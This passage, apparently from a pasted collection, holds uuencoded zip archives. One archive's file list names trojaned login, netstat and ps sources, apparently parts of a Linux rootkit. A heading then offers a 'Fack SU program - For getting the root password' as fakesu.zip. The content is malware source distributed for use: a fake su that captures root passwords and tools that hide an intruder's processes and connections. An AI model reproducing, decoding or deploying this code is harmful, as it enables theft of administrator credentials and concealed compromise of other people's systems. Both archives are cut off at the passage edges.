  11735. M0JS^^N;CN\'AI\]4T(+IRYO(ICH*WD6F=!7!`O)9Y1+HDHL[0W!>XYAB-]_M
  11736. M,92><=(KS&,5AZ=<TR?^^1I$49=$[G-,=1N%#V'M!(#L['1P^%^<T*0W?)XM
  11737. ML8$TG6/'X.+MX<GPW>'1P<DI[(<7&'T6)R.&X8H8\N7QX\]D7\C]UBC\1.HE
  11738. M6W0ZXN^EY^2^&QO1Y\9Z9>.DVX*&R;4H.MUKZ1A4P-E.70=U55AWE8-HPMKY
  11739. MDLP(.[Q&:.+6CZ-P5RS:=:E+SK+/5"QS.KNPR>O$8WT6&]6/N5L+'[&]JJX0
  11740. MN%;R<IYLL7)RW%606`5?'D4FC*X1^-S7;EDW*G^:95IDM-4Y#S1=F'_4*45<
  11741. M_CBQ;FPWVK^T$VRU!]E-,B08S#<;CIRTBD2]L3]^5-?MF%/F<.NS<S9.B#*+
  11742. M>&8I45$W*E$1U%_-RQ@I+.7W.!(I(L[O\0]D!W%THRLW(IO$O9?;Q<Y_OE$R
  11743. MQ_]OU0-;-?J36^6RIO*<)N?[-@M;=SYO7CWJ*@:9.I-M65Q5R[YG(^L*KZ`4
  11744. M[9M9M=:%C6SP3VF*\+M3^:%Z/24YRP>7!$KD_N,CQ>!I,0TI$X?(-D'H/S]K
  11745. M:*,6]UFM$S3JJ?4K;6RMK$%:)+9'Y\4-!4Y"?==3U''(SU^OO%='%S26*O]T
  11746. M?%%+\6TC_6E>C:SC2//@9\4P:A^GB)O</I3;E5[K`*@B_MX=XS5EUV]EG+D>
  11747. MY=J,ZZ234L6'$T^JSTTF.HRXF(94EW*30B9Q2U>MVYY\'Z>:\D_DK??)16Y)
  11748. MNGR9,;,?!U18U002",3RW66^5E1.]97<=_N!:;`O=*^/4]RIGT'"A(H+PQ=5
  11749. M'=ER`\%]ZRAJ(6_AS$4@7&MKJ-=<`>0=Y4;Q#(I^A-R[+!H0"F/YEA<6*#GN
  11750. M+6J^T$!J,R:SQOP&2\QUIGW;KJ&P+M=E,"+YBC+=UD&))[U>5D"Y2P#"H\ZO
  11751. M,51JCIO,<\V9.^7,-4EG\0QW2:;:H+(V)R"OH'L;K\D@T4)V1(@=']R;6)6K
  11752. MKS>?'8_4M3J5(>?:OKK"(S[WZ>86P#DE:7RB($P\V)5+[BU6VKPX2V_6S;F)
  11753. M2^<L3UD9_=IX3=?.N*2^Q/+D3L1I)<>*?7?'K*<R=@M+"R[#EB<%[B97F-F\
  11754. MU41J3K44<6H^K8!^%<:C!73+3QR%W!V9?_Q#>3R.4>*`06+]_FF-MWF9T"F=
  11755. M?+@S;KZ"P1Z$&^D8A64\+]1:;+5D,S$9^K3Q.H<GDAJ+VE1>95&;ZNG6\V_Y
  11756. MF*(TH\MDY5FH5C;^:M3*DU#^/FW\1?-.V%\)W2]87'U$)7-E4=ASCW+C>H=.
  11757. M#ZFD@T1+VGF'\*D>VOY>'@B5=&XYR]W$`G:>]N;GD[4]+?N23"=]@WW2ZN5+
  11758. MM=/CK6F,8@D2K9X\KLBCR*-ZI%;>R+D=22WB9.7ZJFTA%?#<HMG5/J[8X0+7
  11759. MIOKP:=<=#=9'5.79H%6/J^%!>WPP1Z!R=T_"%RM;.Z&B:@V^?KM%OU?PF[=S
  11760. MGN_F';B::^)FW<TS"1D@.(Y$Z2O]<5_Y/`O)PX.=RB6Z?%HZ4$U.$NXV]5]=
  11761. M%KZAMC^71WMSWEPZMKQYZ0X`8Y:^;@7.`=9H<IYX=3%S[F9'!8;GTLD:.9$O
  11762. M%MP4N/N;O&E>E+0NW77;H5-&4$^B409O$R6!%C#B&^ON,_5KK`>GGM@(6D<!
  11763. M'ON8%=;][X=F)):8V<X.[KG7T49BU16$"CI)W6#^>QJ'S2[5MS_H_B\_/`S(
  11764. M^`-?PI\@&P[]F;<JF(!__7%_>=UCZW)%Y8UR?M?@`#TIPF/E\9S=>D2Q,(1:
  11765. MNFS;_--WX;=-E.)(_;;0HVAW*:H^#F@W^7^@"NFPSCR8ELN)+E]P&L).1OIS
  11766. M`;*\I-9C'7!WK\K==W19`2I=B]+$%6[*R+:\>(^'E8$CFM#XE?SK9UJ74P,*
  11767. MAB.^FGTOI.[Q?_"2)V!:+4_L>EWK53$2[#U'@<!>@P*].A+TR$HSHO*<.XDE
  11768. M<+/I6&\<QY8@F3P.=2_+F\[/+QZ=[I<W$XBN:I.M<D^J\/,+.0TN!8T0T$1"
  11769. MO;*H(Z]=KMQ37SE$'LEQETLLRR&=E75$S?O^%NT_C:8.':VOUH)>K26]6HMZ
  11770. MM2GK52=L'ED+>+4AX=5*Q,QGZ0^/]>2%4HC[/T+5>O)`H]PC#7*/9IR7K52/
  11771. MD]P(\S40!<?H2C&JAI+IJ@&C:NZK5K>&ZKT%XTM^!UC`BZ_S2YQ5W)7":'/'
  11772. M"4>+O68+AM6W]5M<.(LOE]RR]OVVJZ_O<LHQ&]V8I"OA9%Z(%GF1$';O5<=[
  11773. M\M]KNOU[2)608YY&^=_9!&K)?VH#D04:I;>0_TM(KH)<27U!O<[G_ZUK?:JZ
  11774. MU_>57'\AH?_?5J[OIXTC"#\??\4EE841-3*5^@"4Y"&T:A]2(814J2%*7>S(
  11775. M5N'L<K8C(O&_=[_YL3NSM^>$J#P`>[>_=W9V9O;[CA2=5F!('GK;>8[S&)<^
  11776. MJ]F4$Y^7]W\O9OR_3)^!&:`LS<<'(IAP-LR,36..;!KF>4P?C]4[,RH0E*P/
  11777. MF2_G#\J$Z2_B^6/G>*@;<S)"=\$UX^I?:2&+AK`:#-3`X+5>+\%];1Y9KEXH
  11778. M)$(U5P%$]!;1]`DM47)W@:N>K$&>Q0G-WK[W8(TO:#RNY$L:/U9]1#&S(Z"/
  11779. MW3,25_LZ`;?\DPN%<JD41'=/X5F<[SKF8_GHR?:G9F/)Z<EUI;E$ICK9$AR,
  11780. MI[6^H`L4@+]J]@OT_H:F*-A%[(?;.I[H]GVOLALS[FDJ%GDI]34];NMV<P_U
  11781. M`1EFPQ&EAQOV"5;!/-5(#=N?["P<[542!-#M%;UD=2YT4?BBONBBZY9(M?3E
  11782. M#!Y?;("H7%7K&M5F-MVN]%6I%>SLH=:G-1$2I`&1)`@>-`/N6A\Y-!MIE=@!
  11783. MF)R%CW#@PB;M<Q?K,.W*6,U@-=(19WIT7KL"0G6K9$[RUSI`F9S\M:J*BOJK
  11784. MVB$+B@B6L"!=5NN;("%BOJ3T64[Z@SFPQ-/0$$&`(>T-_.I+\:"3DQ.!7NQJ
  11785. M*.0ZV[5!B*E=V^,N<G2GK`9U.$:ACW:'G]QA<9BDS1P9ATF\*)K$ZR[QB2`S
  11786. M%+B0X9F3Y7!GPQ)CHW4K!+&,`J<+_32>GX+%ZP:8SB-_[@U=NKAPK'0Y8&Z/
  11787. MR*%)E5<\.UHTH%LZ/G"ZA0WW:NS@?8-IBE<&0VYJ#*"0B&91^)^U=K"A]S1\
  11788. M@\*B\J.!)P:_'J/6H(J5:4U2UL<4M&.PLNBD0K<HP#48B&D5DR*"ID?I'=M?
  11789. M,8F%RCII)I>C3>8!1:)B3K>"G-<]\KF-['%>\\#G--+#.<T#CH5EL?,N(!G?
  11790. M[2"YI;N&_=82@[T`V/M$4K&Z1NE6,6CMV^7J4>+9=[/MA`S$C\MXHX%=P98+
  11791. MX=0ZZCC?:O3X+,NIXMW)JPJZJY9+N55%=+5T*;=A+VL(RIB2:3*,"W$I%T<>
  11792. M9^?M<\.841A:J#!X&Y2WLT%_87CDW/#>F'W`*!#Y)`M(>0HO)PH<&W#=#7V+
  11793. M`W#_W_T#9W$2J""^/OZ!UC;'S\@M;)]<L<7H@.[!L&H8E$>?QZCKX1\`?:P-
  11794. M\5N+)TR\(,P!6^?"K^M@L!$/%,9!J#P\^"T85ZO5DK[O,=,ZVOG,\*+;A+S_
  11795. M)#=6=/!\FN!;,HOUT8&?'`]N<Q"[;*B_JK%(E-%U1E7.H;AB2=^J_<Q&ZQQ&
  11796. MJXUIWC00GM'U<E5?!6NG!1%YS+R6.]Q@6DUG/[HR:,]R$B$]:_CJ0M(WC5-D
  11797. M4L'K^N6R>5F?AC\?<8-N^!?9JUA2;D3\:]LW;NOR`=L`3@Y(34$.P/!;-)M9
  11798. MN1L%TN>II=82=+2S0!%\6'%(#'X0=A8)JQCN:<87QEN)W&>YX>%\E8<__+X<
  11799. MV2D,\U,>O.RA;HO_8(VQJWB<8FCX1FXF;R81#>5IK%1SI0@^511T0\.P`+VJ
  11800. MTJD'$SI,-:H*?=-P.VM9Q:"<)=-8K.&18FOQ8UDT5CJ)5HSZ!U/F+0F0XMWQ
  11801. MC^]#6[*D^-5+M/P>/='VI?AY_#B)Z9>^R[H6BP!?^O/56U,"(QZ:B2'>5C[/
  11802. M-(2P5>THPE]F8IS2`H=2W)RI"T;'`T<CF:1!J_)4$+!&!(Q3W]D-?EG\N,*8
  11803. M(\+-W>)^L9Y-#V31]"CPJX9QQC<)#(H&/1+SW)PE]#JC$Q3[_O`,47U@&OA7
  11804. M"^NV5U*YIO];5H6F+NL<FJ&O`'V+E&Y51//N;`ORR9F/QU:2>SE\.C%%294!
  11805. M)%D-8]@IJ=OGB*E&;3S;[D5*%97AF\X1L^N\Z->)[3,$C3^BY+X>T"]N*@$7
  11806. ME#O[P(`1,;^[&(-GES;;8R(REL9HMI>?WQ1GRL>C3$.]R071L!Z-ZGFP:?Z:
  11807. M[Y,>",;+"J?]09_EKJBTQ*8Z^H(%X]#Y:KT][?T'4$L#!!0````(`&&%2QUX
  11808. M;\M7C00``(H*```-````<',O=VAA='1I;64N8Y56;6_;1@S^'/T*3H-=R9$=
  11809. MVRF*-6ZR`JTW=$N6(DD_#&E@G*63?8VD$^XEKC?LOX\\G5^3=!W@2"<>^9!\
  11810. M2-[EJ`,W<Z$!?PR,$@^"%6!K(TH.M9(SQ<H>P`>8<\6G2U"\X$QS,&3C]P/H
  11811. M@*B,1"':V&DA4LADR43E+#.ATX*)$EA%]KJ6E19340BSA%PJ!T40'@VZW2Y8
  11812. M="$,,`-+:17(105*Z'O$BQC&FI,KQ6%!#X3M]6#4C0FD6XITSGAQ_T7.*RTK
  11813. MB/RB?*LM^C6\9ZNTQS-+ZF1Q(3.1"YX!9G?.E%K"KXKS"D5%!IC43#R@#R@E
  11814. MNC**9<((62%'TIK:FH0@4FDK0S$KG0`W*84Y\R!O9\QJW5/6S'#[.<?E_1=@
  11815. M,V2,/.;B*SK,^0*,0,JF=E8(KGM/F/W6@W=R4?`EF;$L0PZQ$**:N5+X*I9<
  11816. M:S;C3H4`-%89-2+'O:QC)-`E*DE=_,71?\%ACM("]3"7P6NX8`I?KX]]$$=!
  11817. M\*.HTL)F'-YHDPG9FY_MB@HQW9>1VUU9GE:FV!792J#UKHS2V-,R9;T'O]1'
  11818. M0J9[<.%BSDQC'FY)45E4N21AH`TSV+#8-0JISF\'PY_N1D$FL8^Q[@^WQ_@5
  11819. MN-V.=O1.&EZC!RFR&/X.@!BU*38`!N4>S?<(=P3U15V*RAJ.O6'K.;:S6V1L
  11820. MJ4?.UKEWBF@ZR3,XA>Y@95PISK($:NF5G2-30@?E!85!8GI/#)!(\U16F5Z;
  11821. MVY+:DCY]1DWP$]3#,$16-$M,\:B#A5?:P(P;USZI58HCAFLB*GGC*&IO^8D)
  11822. M>14*!E[(M%D_UL(44*&A,(^0Z01":`VSDU9_F+4T0)@$!P<KK.Z9*2=$5FLP
  11823. MA)_A2?$)#(:/;)#KY+$ZG,%@@#AA789H%[(RC)N<B5\W`1AX:@MFN$N>E6ZF
  11824. M9;Z:HH8`7_KV#HOM-8V$";ZXF&R$J<;;C,,11*_Z'?P-7\:^H"D><IX.6T.X
  11825. MYNKP%(Y=&7.(&D0\.&"]MT4D')(0[5L9H%Z+EJL62U;&\,,I#&*B0#L&&D?K
  11826. MWGPFVE?]1LNU+>IL])_::U8M&+[<Q]ZL6]Y.Y)$W^.^T?)/XM-8CY"%=(AQ[
  11827. M[3OH<=T1[AI3%S0G.!4>)V;*E2L\G>>^[JX(?CS?0+\9>]B:6%GS*OIT<_%Q
  11828. M\LN'\W$"EY.K]Y=_G/_I@GO6'L/E2DD5A62/\[!&\':8V%=AHH'__">@/WQ@
  11829. MMOQ^A9A`_SR!Z_'X]\GU^*;I03_X&)EC>S&G,QUQO&-WK.`FO38P[<WAE8#&
  11830. MJX!86(NV4O'F"![[,*<HN=]7>#)3M_-=F6Y#8?<^#FB-G?MJX\V!7K#"4T:C
  11831. M8!@>@O_'5[0![UDS,<N:4Y:?KL=7DX]7E^_&U]<QM-O!P9YBQ4I^V[^C*%]\
  11832. M[K^(5ZSX*AP>CE:%^W:;NY[S\^MMDTTI<8!I?MWXZK"I<R%9QAYF41MOJOX=
  11833. MEA#?`_\>WC4ZW_#I[/&6XPK_0SB!5F^(Y]#FZ8YD\-`>>0M8<6-51;?F*,#L
  11834. MZ$*$QU=D0%7ROL.6_EQA<KLW:1R3_;]02P,$%`````@`C(5+'<(K5\!S````
  11835. MG`````T```!P<R]W:&%T=&EM92YHT]=2*,](+"G)S$W5RU#0U=55*$Y-10@E
  11836. M*Z3E%RFD5A3D).8EEF3FYREHZ7-Q*6>FY:6DIBG$QX=[.(:$>/JZQGMP*0-%
  11837. M,O-2406YRO(S4Q0*BC+S2N)+"T!&:H!$-*VYDC,2BQ2TBK%)<2FGYJ5DIG$!
  11838. M`%!+`0(4!@H``````+2^1"+=R\9L*````"@````.``````````$`(`"V@0``
  11839. M``!L:6YU>"YR;V]T+FMI=%!+`0(4!@H``````+(;/B(````````````````&
  11840. M````````````$`#_050```!L;V=I;B]02P$"%`84````"`!TGDL=R>L>:7<$
  11841. M``#7"P``"P`````````!`"``MH%X````;&]G:6XO9FEX+F-02P$"%`84````
  11842. M"`#.G4L=EKDFE]D!``!N`P``#P`````````!`"``MH$8!0``;&]G:6XO9V5T
  11843. M<&%S<RYC4$L!`A0&%`````@`N9U+'<(GG7W&(@``I%H```T``````````0`@
  11844. M`+:!'@<``&QO9VEN+VQO9VEN+F-02P$"%`84````"`"YG4L=O.J[7C,$```T
  11845. M"0``#@`````````!`"``MH$/*@``;&]G:6XO36%K969I;&502P$"%`84````
  11846. M"`#%G4L=-9MQ6KT!``"U`P``$0`````````!`"``MH%N+@``;&]G:6XO<&%T
  11847. M:&YA;65S+FA02P$"%`8*``````"Q&SXB````````````````"```````````
  11848. M`!``_T%:,```;F5T<W1A="]02P$"%`84````"`"B:5`=0OU.EGX```#V````
  11849. M$``````````!`"``MH&`,```;F5T<W1A="]C;VYF:6<N:%!+`0(4!A0````(
  11850. M`,)\4!W)ZQYI=P0``-<+```-``````````$`(`"V@2PQ``!N971S=&%T+V9I
  11851. M>"YC4$L!`A0&"@``````L1L^(@````````````````P````````````0`/]!
  11852. MSC4``&YE='-T870O;&EB+U!+`0(4!A0````(`'!C4!T.[^U8K@(``"(&```0
  11853. M``````````$`(`"V@?@U``!N971S=&%T+VQI8B]A9BYC4$L!`A0&%`````@`
  11854. M<&-0'9[4Q17N!@``A!$``!(``````````0`@`+:!U#@``&YE='-T870O;&EB
  11855. M+V%X,C4N8U!+`0(4!A0````(`'!C4!V=`,XSX@0``-`+```3``````````$`
  11856. M(`"V@?(_``!N971S=&%T+VQI8B]E=&AE<BYC4$L!`A0&%`````@`<&-0'9EC
  11857. MA1=2!```(@D``!4``````````0`@`+:!!44``&YE='-T870O;&EB+V=E=&%R
  11858. M9W,N8U!+`0(4!A0````(`/!Z4!UG_V3I!`,``.0%```5``````````$`(`"V
  11859. M@8I)``!N971S=&%T+VQI8B]G971S;V-K+F-02P$"%`84````"`!P8U`=HZ6G
  11860. M>0,#``"?!P``$``````````!`"``MH'!3```;F5T<W1A="]L:6(O:'<N8U!+
  11861. M`0(4!A0````(`'!C4!T::Z]`>P8``*P0```2``````````$`(`"V@?)/``!N
  11862. M971S=&%T+VQI8B]I;F5T+F-02P$"%`84````"`!P8U`=7(PDR^D"``"@!0``
  11863. M%@`````````!`"``MH&=5@``;F5T<W1A="]L:6(O;&]O<&)A8VLN8U!+`0(4
  11864. M!A0````(`$"I41T!'JB`M````"8!```4``````````$`(`"V@;I9``!N971S
  11865. M=&%T+VQI8B]-86ME9FEL95!+`0(4!A0````(`'!C4!V6Y9WUC@(``)P$```1
  11866. M``````````$`(`"V@:!:``!N971S=&%T+VQI8B]P<'`N8U!+`0(4!A0````(
  11867. M`'!C4!U1NK5:M@,``,X+```2``````````$`(`"V@5U=``!N971S=&%T+VQI
  11868. M8B]S;&EP+F-02P$"%`84````"`"C9%`=(OH;U($"``#<!0``%0`````````!
  11869. M`"``MH%#80``;F5T<W1A="]L:6(O<W5P<&]R="YH4$L!`A0&%`````@`<&-0
  11870. M'?.ZS?LZ`P``3P<``!(``````````0`@`+:!]V,``&YE='-T870O;&EB+W5N
  11871. M:7@N8U!+`0(4!A0````(`"BI41T5-&WC_@```(T!```0``````````$`(`"V
  11872. M@6%G``!N971S=&%T+TUA:V5F:6QE4$L!`A0&%`````@``JA1'=DI'P]R&```
  11873. MC60``!$``````````0`@`+:!C6@``&YE='-T870O;F5T<W1A="YC4$L!`A0&
  11874. M%`````@`B&-0'7BPS!U-`@``(P8``!,``````````0`@`+:!+H$``&YE='-T
  11875. M870O<&%T:&YA;65S+FA02P$"%`84````"`#NJ%$=!7O0U?(````J`@``#@``
  11876. M```````!`"``MH&L@P``;F5T<W1A="]214%$34502P$"%`8*``````"(8U`=
  11877. MWU8BXSP````\````$0`````````!`"``MH'*A```;F5T<W1A="]V97)S:6]N
  11878. M+FA02P$"%`8*``````"Q&SXB````````````````#````````````!``_T$U
  11879. MA0``;F5T<W1A="UO;&0O4$L!`A0&%`````@`[F92':9A;%ZO'@``SET``!$`
  11880. M`````````0`@`+:!7X4``&YE='-T870M;VQD+S(N=75E4$L!`A0&%`````@`
  11881. M!&52'<GK'FEW!```UPL``!$``````````0`@`+:!/:0``&YE='-T870M;VQD
  11882. M+V9I>"YC4$L!`A0&%`````@`HF12'1X)?UV7````W@```!0``````````0`@
  11883. M`+:!XZ@``&YE='-T870M;VQD+TUA:V5F:6QE4$L!`A0&%`````@`Z692';#5
  11884. ML++I$P``!$0``!,````````````@`+:!K*D``&YE='-T870M;VQD+VYE='-T
  11885. M87102P$"%`84````"``B8E(=>('M0=`0``!"3P``%0`````````!`"``MH'&
  11886. MO0``;F5T<W1A="UO;&0O;F5T<W1A="YC4$L!`A0&%`````@`W&92'6?_?4_M
  11887. M&0``YD```!4````````````@`+:!R<X``&YE='-T870M;VQD+VYE='-T870N
  11888. M;U!+`0(4!A0````(`%:\;AS15/5GB`$``&8#```7``````````$`(`"V@>GH
  11889. M``!N971S=&%T+6]L9"]P871H;F%M97,N:%!+`0(4!A0````(`%EE4AW._=J#
  11890. M#0$``$,"```2``````````$`(`"V@:;J``!N971S=&%T+6]L9"]214%$3450
  11891. M2P$"%`8*``````"R&SXB`````````````````P```````````!``_T'CZP``
  11892. M<',O4$L!`A0&%`````@`885+'>_UZOU9`0``P`(```H``````````0`@`+:!
  11893. M!.P``'!S+V%L;&]C+F-02P$"%`84````"`!AA4L=81V![NP,``#_)@``#```
  11894. M```````!`"``MH&%[0``<',O8V]M<&%R92YC4$L!`A0&%`````@`A(5+';`@
  11895. M8^'H!0``X@P```P``````````0`@`+:!F_H``'!S+V1E=FYA;64N8U!+`0(4
  11896. M!A0````(`'.>2QW)ZQYI=P0``-<+```(``````````$`(`"V@:T``0!P<R]F
  11897. M:7@N8U!+`0(4!A0````(`&.%2QWS!)RV#P8``/<1```+``````````$`(`"V
  11898. M@4H%`0!P<R]-86ME9FEL95!+`0(4!A0````(`&&%2QV/_G#35!,``-TT```'
  11899. M``````````$`(`"V@8(+`0!P<R]P<RYC4$L!`A0&%`````@`>(5+'?4?3;)6
  11900. M!```<@D```<``````````0`@`+:!^QX!`'!S+W!S+FA02P$"%`84````"`!H
  11901. MA4L=[2;RL!8"``"K!```"P`````````!`"``MH%V(P$`<',O<'-D871A+FA0
  11902. M2P$"%`84````"`!AA4L=\J)3_EH!``"K`@``#``````````!`"``MH&U)0$`
  11903. M<',O<'=C86-H92YC4$L!`A0&%`````@`!(9+'7ZS"CSQ`0``L@0```P`````
  11904. M`````0`@`+:!.2<!`'!S+W-I9VYA;',N8U!+`0(4!A0````(`/:%2QU3-?""
  11905. M/@$``"("```,``````````$`(`"V@50I`0!P<R]S:6=N86QS+FA02P$"%`84
  11906. M````"`!AA4L=KBQ3ILH/```D.```"0`````````!`"``MH&\*@$`<',O<VYA
  11907. M<"YC4$L!`A0&%`````@`885+'=R=/V/"````90$```L``````````0`@`+:!
  11908. MK3H!`'!S+W-T871U<RYC4$L!`A0&%`````@`885+'4//N6GZ`@``Q0@```P`
  11909. M`````````0`@`+:!F#L!`'!S+W-Y<VEN9F\N8U!+`0(4!A0````(`(^%2QTO
  11910. M1`.>F@```!(!```,``````````$`(`"V@;P^`0!P<R]S>7-I;F9O+FA02P$"
  11911. M%`84````"`#7A4L=`&,*=E<<``#14```"``````````!`"``MH&`/P$`<',O
  11912. M=&]P+F-02P$"%`84````"`!AA4L=>&_+5XT$``"*"@``#0`````````!`"``
  11913. MMH']6P$`<',O=VAA='1I;64N8U!+`0(4!A0````(`(R%2QW"*U?`<P```)P`
  11914. M```-``````````$`(`"V@;5@`0!P<R]W:&%T=&EM92YH4$L%!@`````Y`#D`
  11915. *?`T``%-A`0````$`
  11916. `
  11917. end
  11918.  
  11919. 4. Fack SU program - For getting the root password.
  11920.  
  11921. begin 644 fakesu.zip
  11922. M4$L#!!0````(`"\B1")UVD\.'0P``#DP```(`!``8V]N9FEG+FA56`P`DZ/X
  11923. M,KH,]S+\`0``M9I;<Z-&%H#?\RNZ)@_*IF;&ZTTJ^[!.JC#",C42L(!\>\$8
  11924. M6E*O$4WHQAK-K]]S&B0+A&@EFZV:&NL"7Y]S^EP;7?Q($IXOV/+SZC,A$YK3
  11925. M,I8T)7$E^3J6+(FS;$M>MLU554GALA\OOKLXN(_E`[<N2KX^N)GE",-+5C1.
  11926. M:5G3$#>F"Y93PA:$Y\2P'\A/G[\CA`1;(>F:U%<+(OB:2K:F@J3U]7+%A+KP
  11927. MGI+_5$*239Q+(CF)WS@#84A)U95,,N#2LN0E@=M%O&PT^9XM<KB"1,9T&@7N
  11928. MW#<M%.?[JONINICF*5MTY*T$RY<$M.5)_#G9VZ<AF(AP3:.C)TA(UX7<(D"N
  11929. M*'FEVPTO4Y)RT"WGH`<O7[LLL"-H>`3B\(>#K$LJ7W[YYT<RL<)K_%N_)PM0
  11930. MV2SC[:=_D#A/ZY>/,X\(9=K:>B&8D2RJ/%%F@M<E_;UB8#MU]TXW(JJBX*7$
  11931. M+9(K+NB>T57:-QZC(#3,+X$UB2QGW!$:H>/)_(%LF%R1*Z!<I,L(_D0L7_#/
  11932. MJ]^Z0'7QD>)H.+DME/8THVN:2T%8KCZ/2]"3""K1X9[!%,N25X48*77GHE+>
  11933. MB=Z#VE(0@Y;DF>5R1$"VYR5+(SEJ/*1Q-3#KQ'?G7A"%1'W?\0-<%1?*>)S&
  11934. M;\O1NSUS2E.!`K]04E8Y2E6!<\)"\`I076UAI:EKC(V[2>3Y]IT]M296UX1`
  11935. MJ\6%E94!T1`"3*=<*!_))D*Z;"7Y<=!M>456\1MM]OHCB04$SUX#C)HX*7G;
  11936. M(K?&G;5S[\M3P*O&>T`R=#\FB5CQ*DO1&)4`#_L!W1W6F&>R9%__=G*)Z+9W
  11937. MD92CLFJIMZ($DRS(2P7:\_JS*.5%F<NN&11W['J^$_8:HVQ<&R#@(>!6?)/W
  11938. M[VXO^7T'ATRM@AR3Q_-Z'1>CW9*8.7NL,)L9WFDSH_<)62XP.P[+%H3^36C/
  11939. MK%-ZR[)*((76JLMU](T?>Y$"A;/HR77Z.8?;TC!:VX+BTJ^2EGF<U;&*<2F_
  11940. MY?&:]N@>/CD&2#RH_6[WV\JW,'<03DYXT^:`EA'DG6P?QK$<";*!/PIK0MI=
  11941. M%RR#_(`;@][0M49S<U\EF]F._="]/E*?#ML?D$*J+8@A@420-=9T_;*KF.\L
  11942. M9VH'8836B>:.[3H#_G:EF/OLNK-,30"OF)MAVS*88S*>+_]PDN&+15^243Y:
  11943. M^_B^SA4E?V,I)9X;@*$NR8+&$CH%R,E?$UI(]`I5)%2JKE<[RI>1NCFZ/*C4
  11944. MQR;`)(P:,<QFT$RH(B0D[#*F):X*`"R2+U6F[BN_S3*]BZ"IJERP)8CWA\TE
  11945. MV#?Z;B][UU+4WL?615W:XCH3+_8I.FWI]YKS#=Z"%DNA=">[RT''Y)5`^=N`
  11946. M&5'I@_3VKUKQ#8-:#IEYP[(,\C(BVFU<2M,JP>9.8@'[A$D&"JFJ\-'8]BTS
  11947. M1-?[C?R=_/J;6@J-N(FAH5FQ)5HV3E/85$'%\5U7/7=E?#-\TZ_U32U%&Q6K
  11948. M'$V1?]>V<1?0ZYS/060'/X[J6J=:";6-Z"7U+NY;,_3;@I;9MKN7L$X8S0S3
  11949. M=X/HVG>_6$,1B6L:3F##-M<=+EE`HA'M^`S"L1G=6L;8\H-V?(+:37]\1WQH
  11950. M@&+8Q9^/!+KS?^X7(8',(N(%A?UE>9)5$(4O?->/J2UN:O95\Z8M%]:0Z-X.
  11951. M;Z/@$7HBNS\_EVU<2I,LQO#>EYFNO%!5;.<=^==T/55/UX.A8.4)+RF9SXRC
  11952. M)(V?#=\!MOY)E0N5IJ]8_GN$GE*)BZ2H\!4*AK'$H&V'[44?54(??-VWZL_1
  11953. M3R=J`SA=`@&A$A='*^+,('8)DI(UAYJ!28@M('!SE3U?MA(D9R5\\T/&7BF9
  11954. M<;B79[':VL`S?/,CQ(SZRLXES=3G=\;#W[JRW;O^&)S:GD!#;QL]?EVGK?<F
  11955. M:3<-[3S&/.R+NC6X++)HWZ8C[?W-;F]5X)604(XJ\/NU@\U<+8<`UW7-R;WM
  11956. M!$\8X[@E,(JI$;C=AZM+=N[HA8]_ELYX(C,='^X*I\?^?HG+.--@-Y516"MM
  11957. MV]5RC.NI%>%%7:M>MO)-$DNPE%`[7#=HNW$9.G$R<>9H2`E]66^_9QHA[%\P
  11958. M:(114Z39+BD_[P*=EFO&Q:AN:9IF!OT3.[Z4)%&V#]M6RV9&4]NQ-'HU4O])
  11959. MO4"IT'HX-0=@K<T@=ZG4C".XC"&>R=2,9E80&!,KZ)'ZX-O^I'@P76#@7F!D
  11960. M7U2%ZMY%01,&;3$NV,/V?->,YM[IA'O`AO)P!_-6G$)O4,1"U/D"S:1Z,?4%
  11961. MJ'9X&--:*[@UQNY]=_+:>65G^"B28CO4?0>A9WJ/FA%F*S*^'*0\!E-W,J3Y
  11962. M:%]=*KDN6@[7>%LEHQ6DRA[Z/(QNW2`<%O(*N5^QZAQ4[5[7FH<S[P',=^1:
  11963. MRJO4;B=QLL*D\80-G2@89&LU>WA<L*^[<YA.2X#C\%357],P;ZVCW<%<"@HG
  11964. MH'W3V92TR.)$]9'O4WU[$.\JT`".$I*"ORK9_P=X#1C,I\!\K<,#HA>&.UXR
  11965. MN57.*P[>'PS-XJ,J>%5=D)]SEM#1KO@>S4VVB:%DN[Y]E->;HR7T%4QA^#J%
  11966. MR:ED@#YR2@_Z2HAS\D&L/L'7F?B@4.%*)0O(N#3?=^[-D*Z&C`^8ECY\5/HT
  11967. MC,YYDS./]G"\N+U`)Q95&[DW/J03R55O!,,U[D#\TLTED$9"-WSTNAD*@,N\
  11968. MBO9G"7]TCW?\/>"0=FHNBQY<SW)VH]5^1`-9UC'T)4WQ@$Q5P]6``J-*8U)8
  11969. M?%%EX`GK%YX='4:&EC^SH1MW+`O:E]9"O=O^1DMQL%^G=_X.&G(<)3Y<?K[\
  11970. MY<,9C<&N%F[`)V'D&[TW'W1]W!U@<V`_6=@>>*$UTXP14127RV]1PJN##>I)
  11971. M<%%D^).GR'3GCB;+-<0<"^O@@5*#=$[5T"-D'0)L,5@M&FH0^K8SL6\T=>,%
  11972. M9A\5KP/$:R.P],=(+PD?+F/7IJNK8LFJY'QP&\Q;WW4U&Y"4VV(8XC]Z&D::
  11973. M['JCP2T<FT--T,&179XN2SKL83`=3'Q+YUU`*C9ZDG>O)2TR#@/1`.9FZKJ^
  11974. MAM%S;-IFG&JWWAE@Z&23#D'`QN;]6$M):<;6&L[8FMHS+:F9B891]4,-+0L;
  11975. MII<M'LEH>-@_73\:X['&YGNF+F[W3'WP-LPSB6?QFEGV+SCOWW4R\9)B^M<(
  11976. MZ.'P`/E?*R"Z+E^D\6#2PO`&#W9OQH8F=P$1ZFDI5A0*[#!Q'D`%O+6FTV$B
  11977. M?":C7/)X"`=#7A@YH3OP)*EFL3.\VG;LL]R:B5@DC`VB`B,P;7N8@ZWR<-&8
  11978. M63/M[`,4?%XY3`DL33I<\W3P&<C,'=]H"%6^CHM!QMS1/HPJ8.0<C!G/O=<$
  11979. M2X&G9'@HE&*.8(F&IXY>,3=BHK!-';R"SOQM2$MO'EK.W;"6^,AIB('/FS03
  11980. M+]7)`5NNE4.<E_B"<Q.?P,2'!Q\:FII$=:S?2TW[$?S;UW4>0E>A`WV%_HN.
  11981. M*&290+>)L_$@R3>AWS1G^F>VT"WJ2+>:6HH44>0Z3.`Y6D[]&YEAD.7[NHX*
  11982. M2&<H=I9F\$^#@7]:BN2#Y0P0H:LI9(I2Z3%S'6<K\'<NFE,NV[EQ_W^'9>\4
  11983. M^4U3=<(G;=&I=(EGKD\Y5S@;]AZJM7\,@E-A_T]!#E%%?(%]QSD\SZB[#QUT
  11984. MD>1XBJ\#WIA..-7#H*\\0SJ870R]9#`O,/4X24.#F<$.`SVN.?+6XE3RU^+6
